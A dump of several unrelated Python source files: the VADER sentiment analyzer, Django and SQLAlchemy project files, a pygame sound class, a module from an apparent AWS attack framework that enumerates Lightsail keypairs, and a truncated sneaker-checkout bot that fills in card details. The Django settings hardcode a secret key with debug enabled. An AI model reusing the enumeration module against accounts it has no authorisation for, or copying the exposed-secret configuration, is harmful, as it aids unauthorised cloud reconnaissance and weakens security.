"greatly": B_INCR, "hella": B_INCR, "highly": B_INCR, "hugely": B_INCR, "incredibly": B_INCR,
"intensely": B_INCR, "majorly": B_INCR, "more": B_INCR, "most": B_INCR, "particularly": B_INCR,
"purely": B_INCR, "quite": B_INCR, "really": B_INCR, "remarkably": B_INCR,
"so": B_INCR, "substantially": B_INCR,
"thoroughly": B_INCR, "totally": B_INCR, "tremendously": B_INCR,
"uber": B_INCR, "unbelievably": B_INCR, "unusually": B_INCR, "utterly": B_INCR,
"very": B_INCR,
"almost": B_DECR, "barely": B_DECR, "hardly": B_DECR, "just enough": B_DECR,
"kind of": B_DECR, "kinda": B_DECR, "kindof": B_DECR, "kind-of": B_DECR,
"less": B_DECR, "little": B_DECR, "marginally": B_DECR, "occasionally": B_DECR, "partly": B_DECR,
"scarcely": B_DECR, "slightly": B_DECR, "somewhat": B_DECR,
"sort of": B_DECR, "sorta": B_DECR, "sortof": B_DECR, "sort-of": B_DECR}
# check for special case idioms using a sentiment-laden keyword known to VADER
SPECIAL_CASE_IDIOMS = {"the shit": 3, "the bomb": 3, "bad ass": 1.5, "yeah right": -2,
"cut the mustard": 2, "kiss of death": -1.5, "hand to mouth": -2}
##Static methods##
def negated(input_words, include_nt=True):
"""
Determine if input contains negation words
"""
neg_words = []
neg_words.extend(NEGATE)
for word in neg_words:
if word in input_words:
return True
if include_nt:
for word in input_words:
if "n't" in word:
return True
if "least" in input_words:
i = input_words.index("least")
if i > 0 and input_words[i-1] != "at":
return True
return False
def normalize(score, alpha=15):
"""
Normalize the score to be between -1 and 1 using an alpha that
approximates the max expected value
"""
norm_score = score/math.sqrt((score*score) + alpha)
if norm_score < -1.0:
return -1.0
elif norm_score > 1.0:
return 1.0
else:
return norm_score
def allcap_differential(words):
"""
Check whether just some words in the input are ALL CAPS
:param list words: The words to inspect
:returns: `True` if some but not all items in `words` are ALL CAPS
"""
is_different = False
allcap_words = 0
for word in words:
if word.isupper():
allcap_words += 1
cap_differential = len(words) - allcap_words
if cap_differential > 0 and cap_differential < len(words):
is_different = True
return is_different
def scalar_inc_dec(word, valence, is_cap_diff):
"""
Check if the preceding words increase, decrease, or negate/nullify the
valence
"""
scalar = 0.0
word_lower = word.lower()
if word_lower in BOOSTER_DICT:
scalar = BOOSTER_DICT[word_lower]
if valence < 0:
scalar *= -1
#check if booster/dampener word is in ALLCAPS (while others aren't)
if word.isupper() and is_cap_diff:
if valence > 0:
scalar += C_INCR
else: scalar -= C_INCR
return scalar
class SentiText(object):
"""
Identify sentiment-relevant string-level properties of input text.
"""
def __init__(self, text):
if not isinstance(text, str):
text = str(text.encode('utf-8'))
self.text = text
self.words_and_emoticons = self._words_and_emoticons()
# doesn't separate words from\
# adjacent punctuation (keeps emoticons & contractions)
self.is_cap_diff = allcap_differential(self.words_and_emoticons)
def _words_plus_punc(self):
"""
Returns mapping of form:
{
'cat,': 'cat',
',cat': 'cat',
}
"""
no_punc_text = REGEX_REMOVE_PUNCTUATION.sub('', self.text)
# removes punctuation (but loses emoticons & contractions)
words_only = no_punc_text.split()
# remove singletons
words_only = set( w for w in words_only if len(w) > 1 )
# the product gives ('cat', ',') and (',', 'cat')
punc_before = {''.join(p): p[1] for p in product(PUNC_LIST, words_only)}
punc_after = {''.join(p): p[0] for p in product(words_only, PUNC_LIST)}
words_punc_dict = punc_before
words_punc_dict.update(punc_after)
return words_punc_dict
def _words_and_emoticons(self):
"""
Removes leading and trailing puncutation
Leaves contractions and most emoticons
Does not preserve punc-plus-letter emoticons (e.g. :D)
"""
wes = self.text.split()
words_punc_dict = self._words_plus_punc()
wes = [we for we in wes if len(we) > 1]
for i, we in enumerate(wes):
if we in words_punc_dict:
wes[i] = words_punc_dict[we]
return wes
class SentimentIntensityAnalyzer(object):
"""
Give a sentiment intensity score to sentences.
"""
def __init__(self, lexicon_file="vader_lexicon.txt"):
_this_module_file_path_ = abspath(getsourcefile(lambda:0))
lexicon_full_filepath = join(dirname(_this_module_file_path_), lexicon_file)
with open(lexicon_full_filepath) as f:
self.lexicon_full_filepath = f.read()
self.lexicon = self.make_lex_dict()
def make_lex_dict(self):
"""
Convert lexicon file to a dictionary
"""
lex_dict = {}
for line in self.lexicon_full_filepath.split('\n'):
(word, measure) = line.strip().split('\t')[0:2]
lex_dict[word] = float(measure)
return lex_dict
def polarity_scores(self, text):
"""
Return a float for sentiment strength based on the input text.
Positive values are positive valence, negative value are negative
valence.
"""
sentitext = SentiText(text)
#text, words_and_emoticons, is_cap_diff = self.preprocess(text)
sentiments = []
words_and_emoticons = sentitext.words_and_emoticons
for item in words_and_emoticons:
valence = 0
i = words_and_emoticons.index(item)
if (i < len(words_and_emoticons) - 1 and item.lower() == "kind" and \
words_and_emoticons[i+1].lower() == "of") or \
item.lower() in BOOSTER_DICT:
sentiments.append(valence)
continue
sentiments = self.sentiment_valence(valence, sentitext, item, i, sentiments)
sentiments = self._but_check(words_and_emoticons, sentiments)
valence_dict = self.score_valence(sentiments, text)
return valence_dict
def sentiment_valence(self, valence, sentitext, item, i, sentiments):
is_cap_diff = sentitext.is_cap_diff
words_and_emoticons = sentitext.words_and_emoticons
item_lowercase = item.lower()
if item_lowercase in self.lexicon:
#get the sentiment valence
valence = self.lexicon[item_lowercase]
#check if sentiment laden word is in ALL CAPS (while others aren't)
if item.isupper() and is_cap_diff:
if valence > 0:
valence += C_INCR
else:
valence -= C_INCR
for start_i in range(0,3):
if i > start_i and words_and_emoticons[i-(start_i+1)].lower() not in self.lexicon:
# dampen the scalar modifier of preceding words and emoticons
# (excluding the ones that immediately preceed the item) based
# on their distance from the current item.
s = scalar_inc_dec(words_and_emoticons[i-(start_i+1)], valence, is_cap_diff)
if start_i == 1 and s != 0:
s = s*0.95
if start_i == 2 and s != 0:
s = s*0.9
valence = valence+s
valence = self._never_check(valence, words_and_emoticons, start_i, i)
if start_i == 2:
valence = self._idioms_check(valence, words_and_emoticons, i)
# future work: consider other sentiment-laden idioms
# other_idioms =
# {"back handed": -2, "blow smoke": -2, "blowing smoke": -2,
# "upper hand": 1, "break a leg": 2,
# "cooking with gas": 2, "in the black": 2, "in the red": -2,
# "on the ball": 2,"under the weather": -2}
valence = self._least_check(valence, words_and_emoticons, i)
sentiments.append(valence)
return sentiments
def _least_check(self, valence, words_and_emoticons, i):
# check for negation case using "least"
if i > 1 and words_and_emoticons[i-1].lower() not in self.lexicon \
and words_and_emoticons[i-1].lower() == "least":
if words_and_emoticons[i-2].lower() != "at" and words_and_emoticons[i-2].lower() != "very":
valence = valence*N_SCALAR
elif i > 0 and words_and_emoticons[i-1].lower() not in self.lexicon \
and words_and_emoticons[i-1].lower() == "least":
valence = valence*N_SCALAR
return valence
def _but_check(self, words_and_emoticons, sentiments):
# check for modification in sentiment due to contrastive conjunction 'but'
if 'but' in words_and_emoticons or 'BUT' in words_and_emoticons:
try:
bi = words_and_emoticons.index('but')
except ValueError:
bi = words_and_emoticons.index('BUT')
for sentiment in sentiments:
si = sentiments.index(sentiment)
if si < bi:
sentiments.pop(si)
sentiments.insert(si, sentiment*0.5)
elif si > bi:
sentiments.pop(si)
sentiments.insert(si, sentiment*1.5)
return sentiments
def _idioms_check(self, valence, words_and_emoticons, i):
onezero = "{0} {1}".format(words_and_emoticons[i-1], words_and_emoticons[i])
twoonezero = "{0} {1} {2}".format(words_and_emoticons[i-2],
words_and_emoticons[i-1], words_and_emoticons[i])
twoone = "{0} {1}".format(words_and_emoticons[i-2], words_and_emoticons[i-1])
threetwoone = "{0} {1} {2}".format(words_and_emoticons[i-3],
words_and_emoticons[i-2], words_and_emoticons[i-1])
threetwo = "{0} {1}".format(words_and_emoticons[i-3], words_and_emoticons[i-2])
sequences = [onezero, twoonezero, twoone, threetwoone, threetwo]
for seq in sequences:
if seq in SPECIAL_CASE_IDIOMS:
valence = SPECIAL_CASE_IDIOMS[seq]
break
if len(words_and_emoticons)-1 > i:
zeroone = "{0} {1}".format(words_and_emoticons[i], words_and_emoticons[i+1])
if zeroone in SPECIAL_CASE_IDIOMS:
valence = SPECIAL_CASE_IDIOMS[zeroone]
if len(words_and_emoticons)-1 > i+1:
zeroonetwo = "{0} {1} {2}".format(words_and_emoticons[i], words_and_emoticons[i+1], words_and_emoticons[i+2])
if zeroonetwo in SPECIAL_CASE_IDIOMS:
valence = SPECIAL_CASE_IDIOMS[zeroonetwo]
# check for booster/dampener bi-grams such as 'sort of' or 'kind of'
if threetwo in BOOSTER_DICT or twoone in BOOSTER_DICT:
valence = valence+B_DECR
return valence
def _never_check(self, valence, words_and_emoticons, start_i, i):
if start_i == 0:
if negated([words_and_emoticons[i-1]]):
valence = valence*N_SCALAR
if start_i == 1:
if words_and_emoticons[i-2] == "never" and\
(words_and_emoticons[i-1] == "so" or
words_and_emoticons[i-1] == "this"):
valence = valence*1.5
elif negated([words_and_emoticons[i-(start_i+1)]]):
valence = valence*N_SCALAR
if start_i == 2:
if words_and_emoticons[i-3] == "never" and \
(words_and_emoticons[i-2] == "so" or words_and_emoticons[i-2] == "this") or \
(words_and_emoticons[i-1] == "so" or words_and_emoticons[i-1] == "this"):
valence = valence*1.25
elif negated([words_and_emoticons[i-(start_i+1)]]):
valence = valence*N_SCALAR
return valence
def _punctuation_emphasis(self, sum_s, text):
# add emphasis from exclamation points and question marks
ep_amplifier = self._amplify_ep(text)
qm_amplifier = self._amplify_qm(text)
punct_emph_amplifier = ep_amplifier+qm_amplifier
return punct_emph_amplifier
def _amplify_ep(self, text):
# check for added emphasis resulting from exclamation points (up to 4 of them)
ep_count = text.count("!")
if ep_count > 4:
ep_count = 4
# (empirically derived mean sentiment intensity rating increase for
# exclamation points)
ep_amplifier = ep_count*0.292
return ep_amplifier
def _amplify_qm(self, text):
# check for added emphasis resulting from question marks (2 or 3+)
qm_count = text.count("?")
qm_amplifier = 0
if qm_count > 1:
if qm_count <= 3:
# (empirically derived mean sentiment intensity rating increase for
# question marks)
qm_amplifier = qm_count*0.18
else:
qm_amplifier = 0.96
return qm_amplifier
def _sift_sentiment_scores(self, sentiments):
# want separate positive versus negative sentiment scores
pos_sum = 0.0
neg_sum = 0.0
neu_count = 0
for sentiment_score in sentiments:
if sentiment_score > 0:
pos_sum += (float(sentiment_score) +1) # compensates for neutral words that are counted as 1
if sentiment_score < 0:
neg_sum += (float(sentiment_score) -1) # when used with math.fabs(), compensates for neutrals
if sentiment_score == 0:
neu_count += 1
return pos_sum, neg_sum, neu_count
def score_valence(self, sentiments, text):
if sentiments:
sum_s = float(sum(sentiments))
# compute and add emphasis from punctuation in text
punct_emph_amplifier = self._punctuation_emphasis(sum_s, text)
if sum_s > 0:
sum_s += punct_emph_amplifier
elif sum_s < 0:
sum_s -= punct_emph_amplifier
compound = normalize(sum_s)
# discriminate between positive, negative and neutral sentiment scores
pos_sum, neg_sum, neu_count = self._sift_sentiment_scores(sentiments)
if pos_sum > math.fabs(neg_sum):
pos_sum += (punct_emph_amplifier)
elif pos_sum < math.fabs(neg_sum):
neg_sum -= (punct_emph_amplifier)
total = pos_sum + math.fabs(neg_sum) + neu_count
pos = math.fabs(pos_sum / total)
neg = math.fabs(neg_sum / total)
neu = math.fabs(neu_count / total)
else:
compound = 0.0
pos = 0.0
neg = 0.0
neu = 0.0
sentiment_dict = \
{"neg" : round(neg, 3),
"neu" : round(neu, 3),
"pos" : round(pos, 3),
"compound" : round(compound, 4)}
return sentiment_dict
if __name__ == '__main__':
# --- examples -------
sentences = ["VADER is smart, handsome, and funny.", # positive sentence example
"VADER is not smart, handsome, nor funny.", # negation sentence example
"VADER is smart, handsome, and funny!", # punctuation emphasis handled correctly (sentiment intensity adjusted)
"VADER is very smart, handsome, and funny.", # booster words handled correctly (sentiment intensity adjusted)
"VADER is VERY SMART, handsome, and FUNNY.", # emphasis for ALLCAPS handled
"VADER is VERY SMART, handsome, and FUNNY!!!",# combination of signals - VADER appropriately adjusts intensity
"VADER is VERY SMART, uber handsome, and FRIGGIN FUNNY!!!",# booster words & punctuation make this close to ceiling for score
"The book was good.", # positive sentence
"The book was kind of good.", # qualified positive sentence is handled correctly (intensity adjusted)
"The plot was good, but the characters are uncompelling and the dialog is not great.", # mixed negation sentence
"At least it isn't a horrible book.", # negated negative sentence with contraction
"Make sure you :) or :D today!", # emoticons handled
"Today SUX!", # negative slang with capitalization emphasis
"Today only kinda sux! But I'll get by, lol" # mixed sentiment example with slang and constrastive conjunction "but"
]
analyzer = SentimentIntensityAnalyzer()
print("----------------------------------------------------")
print(" - Analyze typical example cases, including handling of:")
print(" -- negations")
print(" -- punctuation emphasis & punctuation flooding")
print(" -- word-shape as emphasis (capitalization difference)")
print(" -- degree modifiers (intensifiers such as 'very' and dampeners such as 'kind of')")
print(" -- slang words as modifiers such as 'uber' or 'friggin' or 'kinda'")
print(" -- contrastive conjunction 'but' indicating a shift in sentiment; sentiment of later text is dominant")
print(" -- use of contractions as negations")
print(" -- sentiment laden emoticons such as :) and :D")
print(" -- sentiment laden slang words (e.g., 'sux')")
print(" -- sentiment laden initialisms and acronyms (for example: 'lol') \n")
for sentence in sentences:
vs = analyzer.polarity_scores(sentence)
print("{:-<65} {}".format(sentence, str(vs)))
print("----------------------------------------------------")
print(" - About the scoring: ")
print(""" -- The 'compound' score is computed by summing the valence scores of each word in the lexicon, adjusted
according to the rules, and then normalized to be between -1 (most extreme negative) and +1 (most extreme positive).
This is the most useful metric if you want a single unidimensional measure of sentiment for a given sentence.
Calling it a 'normalized, weighted composite score' is accurate.""")
print(""" -- The 'pos', 'neu', and 'neg' scores are ratios for proportions of text that fall in each category (so these
should all add up to be 1... or close to it with float operation). These are the most useful metrics if
you want multidimensional measures of sentiment for a given sentence.""")
print("----------------------------------------------------")
tricky_sentences = ["Sentiment analysis has never been good.",
"Sentiment analysis has never been this good!",
"Most automated sentiment analysis tools are shit.",
"With VADER, sentiment analysis is the shit!",
"Other sentiment analysis tools can be quite bad.",
"On the other hand, VADER is quite bad ass!",
"Roger Dodger is one of the most compelling variations on this theme.",
"Roger Dodger is one of the least compelling variations on this theme.",
"Roger Dodger is at least compelling as a variation on the theme."
]
print("----------------------------------------------------")
print(" - Analyze examples of tricky sentences that cause trouble to other sentiment analysis tools.")
print(" -- special case idioms - e.g., 'never good' vs 'never this good', or 'bad' vs 'bad ass'.")
print(" -- special uses of 'least' as negation versus comparison \n")
for sentence in tricky_sentences:
vs = analyzer.polarity_scores(sentence)
print("{:-<69} {}".format(sentence, str(vs)))
print("----------------------------------------------------")
print("----------------------------------------------------")
print(" - VADER works best when analysis is done at the sentence level (but it can work on single words or entire novels).")
paragraph = "It was one of the worst movies I've seen, despite good reviews. Unbelievably bad acting!! Poor direction. VERY poor production. The movie was bad. Very bad movie. VERY BAD movie!"
print(" -- For example, given the following paragraph text from a hypothetical movie review:\n\t'{}'".format(paragraph))
print(" -- You could use NLTK to break the paragraph into sentence tokens for VADER, then average the results for the paragraph like this: \n")
# simple example to tokenize paragraph into sentences for VADER
from nltk import tokenize
sentence_list = tokenize.sent_tokenize(paragraph)
paragraphSentiments=0.0
for sentence in sentence_list:
vs = analyzer.polarity_scores(sentence)
print("{:-<69} {}".format(sentence, str(vs["compound"])))
paragraphSentiments += vs["compound"]
print("AVERAGE SENTIMENT FOR PARAGRAPH: \t" + str(round(paragraphSentiments/len(sentence_list), 4)))
print("----------------------------------------------------")
| [
"noreply@github.com"
] | JeongWonJo.noreply@github.com |
021676a563b8c2aaac34f7d2d9a6da9dfee4e013 | c10e381828be393b9d7d8ae72a75b00949de2437 | /globals/models/base.py | 6bc11f36125b802d2f32d939c69d841b953b2b8b | [
"BSD-2-Clause"
] | permissive | procool/mygw | afcdb4b2ef3be6f38f8a28a4505d2e088912f5eb | f35b72b5915d314e883dcde45c3c33ff26f173df | refs/heads/master | 2021-01-10T04:40:12.083642 | 2003-01-17T10:30:00 | 2003-01-17T10:30:00 | 48,728,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import MetaData
Base = declarative_base()
metadata = MetaData()
loaded_models = {
}
## get model, e.g: "users.Users": "users/sa_model.py" with class: "Users"
def get_model(model_):
if model_ in loaded_models:
return loaded_models[model_]
current = __name__.split(".")
path_ = current[0:-1]
model = model_.split(".")
path_ += (model[0], 'sa_model')
## Get module MODULE/sa_model:
mod = __import__(".".join(path_))
for i in path_[1:]:
mod = getattr(mod, i)
## Get model by module attr:
model__ = getattr(mod, model[1])
## Make new (SA)class of MODEL, Base:
##cls_ = type(model[1], (model__, Base), {})
cls_ = model__
loaded_models[model_] = cls_
return get_model(model_)
| [
"procool@procool.ru"
] | procool@procool.ru |
0f57aed3e7ad16725c7f7040d0eba97700db9dc9 | 92e5fa96b12944857366ed356eae2ffa1f778ddc | /zero_blog/urls.py | 38cd40f59ac1fd8d4054d709d2c7fde78958f03e | [] | no_license | vividlier/blog | a107675687b5519f8c38b2baa8af42ed93581955 | f1ba9f2a9e237049036c69e7725e0b9d518f756e | refs/heads/master | 2021-05-11T08:53:10.777947 | 2018-01-23T06:59:41 | 2018-01-23T06:59:41 | 118,065,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | # -*- coding:utf-8 -*-
"""zero_blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.urls import path
from django.conf.urls import include,url
from django.contrib import admin
from django.conf import settings
from blog.uploads import upload_image
urlpatterns = [
# url(r"^uploads/(?P<path>.*)$", \
# "django.views.static.serve", \
# {"document_root": settings.MEDIA_ROOT, }),
url(r'^admin/upload/(?P<dir_name>[^/]+)$', upload_image, name='upload_image'),
url(r'^admin/', admin.site.urls),
url(r'^', include('blog.urls', namespace='blog')),
]
| [
"786410317@qq.com"
] | 786410317@qq.com |
3f3fb632bea88ffa2e488c584544669d6e396c19 | f7328c45c872b69c3b7c2a2bf563257f51e5fbff | /src/sound.py | 02015b9b715fb2938284ce88bb0d22e84a8a2496 | [
"MIT"
] | permissive | whoji/banjiu_2048 | ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79 | d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5 | refs/heads/master | 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 | Python | UTF-8 | Python | false | false | 2,088 | py | import pygame
from flags import F
class SoundPlayer(object):
"""docstring for SoundPlayer"""
def __init__(self, pygame):
self.pygame = pygame
self.__load_sound()
self.is_playing = False
def __load_sound(self):
self.sounds = {
'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
}
self.sounds['move'].set_volume(0.3)
self.sounds['main_menu'].set_volume(0.5)
self.sounds['game_over'].set_volume(0.3)
self.sounds['game_finish'].set_volume(0.3)
def play_sound_effect(self, event, game_status):
if game_status == 1: # main menu
if not self.is_playing:
self.sounds['main_menu'].play()
self.is_playing = True
return
elif game_status == 4:
if not self.is_playing:
self.sounds['game_over'].play()
self.is_playing = True
return
elif game_status == 6:
if not self.is_playing:
self.sounds['game_finish'].play()
self.is_playing = True
return
else:
if event[2]: # upgrade
self.sounds['castle'].play()
return
if event[3]: # cancelled_list is not empty
self.sounds['castle'].play()
return
#elif event[1]:
# self.sounds['merge'].play()
#elif event[0]:
# self.sounds['move'].play()
def play_action_sound(self):
self.sounds['move'].play()
| [
"minli1985@gmail.com"
] | minli1985@gmail.com |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/lightsail_enum_keypairs.py | b60a67c5e6315a9d9da0f5817af2698ca230cd17 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
target = ''
technique_info = {
'blackbot_id': 'T1526.b.001',
'external_id': '',
'controller': 'lightsail_enum_keypairs',
'services': ['Lightsail'],
'external_dependencies': [],
'arguments_to_autocomplete': [],
'version': '1',
'aws_namespaces': [],
'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
'ttp_exec': '',
'ttp_mitigation': '',
'ttp_detection': '',
'intent': 'Captures common data associated with Lightsail',
'name': 'Cloud Service Discovery: Lightsail' ,
}
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
args = parser.parse_args(args)
import_path = 'ttp.src.lightsail_enum_keypairs_src'
src_code = __import__(import_path, globals(), locals(), ['technique_info'], 0)
importlib.reload(src_code)
awsattack_main.chain = True
return src_code.main(args, awsattack_main)
def summary(data, awsattack_main):
out = ' Regions Enumerated:\n'
for region in data['regions']:
out += ' {}\n'.format(region)
del data['regions']
for field in data:
out += ' {} {} enumerated\n'.format(data[field], field[:-1] + '(s)')
return out
| [
"github.nk@blackbot.io"
] | github.nk@blackbot.io |
40b9b4e12b21edda18047af4cfccf7dc4badd5e2 | 11195b96533b1d2a9d24ef41b928a6f0803086b8 | /env/bin/pip3 | 1e9d110ceb7029f455c97c28678e8c18a58c720d | [] | no_license | Zak652/blog_project | a234b8dd41ae530dbf7bf0495acc37abaa786b54 | e540345aeb8ca89cbc75851d3dcd108a1cdedb20 | refs/heads/master | 2021-08-24T07:50:30.346942 | 2017-12-08T18:13:46 | 2017-12-08T18:13:46 | 112,940,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | #!/home/zak/school/projects/blog/env/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"m2kzak@gmail.com"
] | m2kzak@gmail.com | |
05f6d934deeeb2713eabf5a69493098199c22a84 | 74a87d4593680e997ad6d8932911060094b4846b | /project/settings.py | 53bddffcad577ca63b5076f34a655448a7a76027 | [] | no_license | jeremiasbittencourt/CadUs | 742f86686a1c54f97efbf65dcaba75a8ab27d50a | d948a6dd3ffaec32bae3a1d9ad5755c47f4386c0 | refs/heads/main | 2023-04-01T01:03:08.872795 | 2021-04-10T11:52:30 | 2021-04-10T11:52:30 | 356,567,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,363 | py | """
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import django_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-u_#j=#53!v4@z_&wnq)2_fo7*#nx#-d*x_d3)q03d_7)e-k9e1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = Path.joinpath(BASE_DIR, 'static_collected')
django_heroku.settings(locals())
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"jeremiasbittencourt2013@gmail.com"
] | jeremiasbittencourt2013@gmail.com |
c25b162a552a368dede859e7374213e344fb9f6c | 65b5a70eea4c21fbd751666c2516aff1a9e5162c | /kithBot.py | ea28594ffbf3f16818509643d1cb855a3317207f | [] | no_license | dlsstanford/Walbot | 098764e6b778c23ee7bf279293aabf450239ccb0 | 527f1afd854b4f02bd44ecc6b834e95426c1d115 | refs/heads/master | 2023-02-08T23:16:39.603592 | 2020-12-29T21:20:58 | 2020-12-29T21:20:58 | 296,972,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,192 | py | #!/usr/bin/python3
from splinter import Browser
import textwrap
import bs4
import requests
import json
class KithBot:
def __init__(self, **info):
self.base_url = "https://kith.com/"
self.shop_ext = "collections/"
self.checkout_ext = "checkout/"
self.info = info
def init_browser(self):
self.b = Browser('chrome')
def find_product(self):
try:
r = requests.get("{}{}{}".format(
self.base_url, self.shop_ext, self.info["category"])).text
soup = bs4.BeautifulSoup(r, 'lxml')
temp_tuple = []
temp_link = []
for link in soup.find_all("a", class_="product-card__link"):
temp_tuple.append((link["href"], link.contents[1].text, link.contents[3].text))
for i in temp_tuple:
if i[1] == self.info["product"] and i[2] == self.info["color"]:
temp_link.append(i[0])
self.final_link = list(
set([x for x in temp_link if temp_link.count(x) == 1]))[0]
print(self.final_link)
except requests.ConnectionError as e:
print("Failed to open url")
def visit_site(self):
size = '//div[@data-value='+ self.info["size"] + ']'
self.b.visit("{}{}".format(self.base_url, str(self.final_link)))
self.b.find_by_xpath(size).click()
self.b.find_by_name('add').click()
self.b.find_by_name('checkout').click()
def shipping_func(self):
self.b.fill("checkout[email]", self.info["emailfield"])
self.b.fill("checkout[shipping_address][first_name]", self.info["firstName"])
self.b.fill("checkout[shipping_address][last_name]", self.info["lastName"])
self.b.fill("checkout[shipping_address][address1]", self.info["addressfield"])
self.b.fill("checkout[shipping_address][city]", self.info["city"])
self.b.fill("checkout[shipping_address][zip]", self.info["zip"])
self.b.fill("checkout[shipping_address][phone]", self.info["phonefield"])
self.b.find_by_id('continue_button').click()
self.b.find_by_id('continue_button').click()
def checkout_func(self):
id0 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[0]['id']
with self.b.get_iframe(id0) as iframe:
num = textwrap.wrap(self.info["number"], 4)
iframe.find_by_name("number").type(num[0])
iframe.find_by_name("number").type(num[1])
iframe.find_by_name("number").type(num[2])
iframe.find_by_name("number").type(num[3])
id1 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[1]['id']
with self.b.get_iframe(id1):
self.b.fill("name", self.info["nameField"])
id2 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[2]['id']
with self.b.get_iframe(id2) as iframe:
num = textwrap.wrap(self.info["expiry"], 2)
iframe.find_by_name("expiry").type(num[0])
iframe.find_by_name("expiry").type(num[1])
id3 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[3]['id']
with self.b.get_iframe(id3):
self.b.fill("verification_value", self.info["ccv"])
# self.b.find_by_id('continue_button').click()
def main(self):
self.init_browser()
self.find_product()
self.visit_site()
self.shipping_func()
self.checkout_func()
if __name__ == "__main__":
INFO = {
"driver": "geckodriver",
